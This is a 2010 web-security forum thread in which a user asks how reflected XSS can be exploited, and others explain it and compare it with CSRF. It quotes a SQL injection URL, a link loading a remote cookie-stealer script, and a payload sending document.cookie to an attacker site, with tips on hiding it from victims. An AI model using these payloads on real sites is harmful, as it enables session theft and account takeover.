I don't really get XSS

Discuss the many weaknesses of browser security and ways to mitigate the threat

I don't really get XSS

Post by Cherchemin on Fri Aug 20, 2010 7:55 am
([msg=43977]see I don't really get XSS[/msg])

Hi there,

I'm currently doing some blind pentesting and found good old SQL injection vulnerabilty which looks like :

index.php?var1=something&id_stuff=1 union all select 1,table_name,3 from information_schema.tables--

So clearly "id_stuff" is wide open (as far as i can tell, it only escapes quotes).

But i also saw that whatever i type in "id_stuff", it is then repeated on the resulting webpage.
So if i'm learning right, that's called a XSS vulnerability. I then tried this :

index.php?var1=something&id_stuff=1--<PLAINTEXT>

and saw the resulting page was showing sourcecode (So the plaintext tag was doing his job)

Still i don't really get how this kind of XSS attack is dangerous. (I'm myself much better at doing SQL injection ones)
As my "defacing" is only shown to me, i don't understand how you can exploit such vulnerabilities. Everything i read on the Net always show a wonderful alert in javascript which is pretty useless in my case (since there is no cookie to steal and my injection doesn't last)

So what XSS is really good for ?

P.S.: On a side note, i'm going to suggest in my pentesting report that the "id_stuff" should be int only. I suppose it's enough to fix the whole thing ?
Cherchemin
New User
New User
 
Posts: 2
Joined: Tue Sep 09, 2008 10:39 am
Blog: View Blog (0)


Re: I don't really get XSS

Post by tremor77 on Fri Aug 20, 2010 9:17 am
([msg=43981]see Re: I don't really get XSS[/msg])

What you are creating is a temporary XSS, injecting code that is only run by you... the danger is in this particular case showing source code... but not a permanent defacement of the webpage.

Permanent XSS on the other hand is quite dangerous. This is generally due to an unsanitized user input box, url get, etc.., which could potentially end up saving malicious code int he database or the page itself.

I think the way to take advantage of a temporary XSS exploit, however... is to using a referral link send browsers to that exploit in such a manner as that they load a cookie stealer into the site. something like...

Code: Select all
<a href="xyz.com/login.php?var1=<script src="abc.com/cookiestealer.js">CLICK HERE TO LOGIN TO XYZ.COM</a>


my example is rough.. but thats the general concept... its not the site that has the vulnerability but the users visiting the site are vulnerable.

sanddbox will correct me if i'm wrong :)
Image
User avatar
tremor77
Contributor
Contributor
 
Posts: 896
Joined: Wed Mar 31, 2010 12:00 pm
Location: New York
Blog: View Blog (0)


Re: I don't really get XSS

Post by fashizzlepop on Fri Aug 20, 2010 10:50 am
([msg=43986]see Re: I don't really get XSS[/msg])

Yup, you got it tremor. Of course, if other parts of the site are vulnerable, this could also be one way to spread an XSS worm.
The glass is neither half-full nor half-empty; it's merely twice as big as it needs to be.
User avatar
fashizzlepop
Developer
Developer
 
Posts: 2303
Joined: Sat May 24, 2008 1:20 pm
Blog: View Blog (0)


Re: I don't really get XSS

Post by 0xBEEF1337 on Fri Aug 20, 2010 1:10 pm
([msg=43994]see Re: I don't really get XSS[/msg])

Delete.
Last edited by 0xBEEF1337 on Sat Jan 29, 2011 3:21 pm, edited 1 time in total.
0xBEEF1337
Experienced User
Experienced User
 
Posts: 75
Joined: Wed Jul 07, 2010 11:34 pm
Blog: View Blog (0)


Re: I don't really get XSS

Post by Cherchemin on Fri Aug 20, 2010 2:49 pm
([msg=44000]see Re: I don't really get XSS[/msg])

Thanks for the reply. I won't say XSS is now clearer to me but your answers help !

Time for some more reading about XSS i guess :)
Cherchemin
New User
New User
 
Posts: 2
Joined: Tue Sep 09, 2008 10:39 am
Blog: View Blog (0)


Re: I don't really get XSS

Post by sanddbox on Sat Aug 21, 2010 1:50 am
([msg=44014]see Re: I don't really get XSS[/msg])

Tremor: That example wouldn't work. I believe this would:

Code: Select all
<script>window.location="http://myevilsite.com/cookiestealer.php?cookies=" + document.cookie;</script>


If you don't want your victim to know they're getting wtfpwned, instead of just redirecting them as in the above example, embed the link in an image tag. It's the same concept, though.
Image

HTS User Composition:
95% Male
4.98% Female
.01% Monica
.01% Goat
User avatar
sanddbox
Expert
Expert
 
Posts: 2331
Joined: Sat Jul 04, 2009 5:20 pm
Blog: View Blog (0)


Re: I don't really get XSS

Post by fashizzlepop on Sun Aug 22, 2010 2:32 pm
([msg=44076]see Re: I don't really get XSS[/msg])

Also check out CSRF exploits. Along the same lines.
The glass is neither half-full nor half-empty; it's merely twice as big as it needs to be.
User avatar
fashizzlepop
Developer
Developer
 
Posts: 2303
Joined: Sat May 24, 2008 1:20 pm
Blog: View Blog (0)


Re: I don't really get XSS

Post by Cryptovirus on Thu Aug 26, 2010 10:12 am
([msg=44352]see Re: I don't really get XSS[/msg])

CSRF exploits aren't exactly along the same lines. CSRF is more dangerous in that your browser doesn't have to "see" active content such as JavaScript, so an image laced with a simple malicious src is enough.

Temporary XSS is much more worthless, although "dangerous" in the sense that cookies could be stolen - however, stealing cookies in this manner is...inelegant, so to speak.

Although you could also post forms using such XSS, making it equivalent to CSRF - even so, the ability of CSRF to hide in plain sight (server side redirects + image) without the need to lure victims to other websites is priceless.
Cryptovirus
New User
New User
 
Posts: 21
Joined: Wed Aug 25, 2010 7:37 am
Blog: View Blog (0)



Return to Web

Who is online

Users browsing this forum: No registered users and 0 guests